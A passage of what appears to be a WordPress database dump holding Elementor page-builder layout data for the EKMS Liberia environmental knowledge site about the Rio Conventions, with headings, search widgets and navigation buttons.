center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics and Institutions Resources.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5920,534,'_elementor_version','2.7.5'),(5921,534,'_elementor_template_type','wp-page'),(5924,535,'_wp_page_template','default'),(5925,535,'_elementor_edit_mode','builder'),(5926,535,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 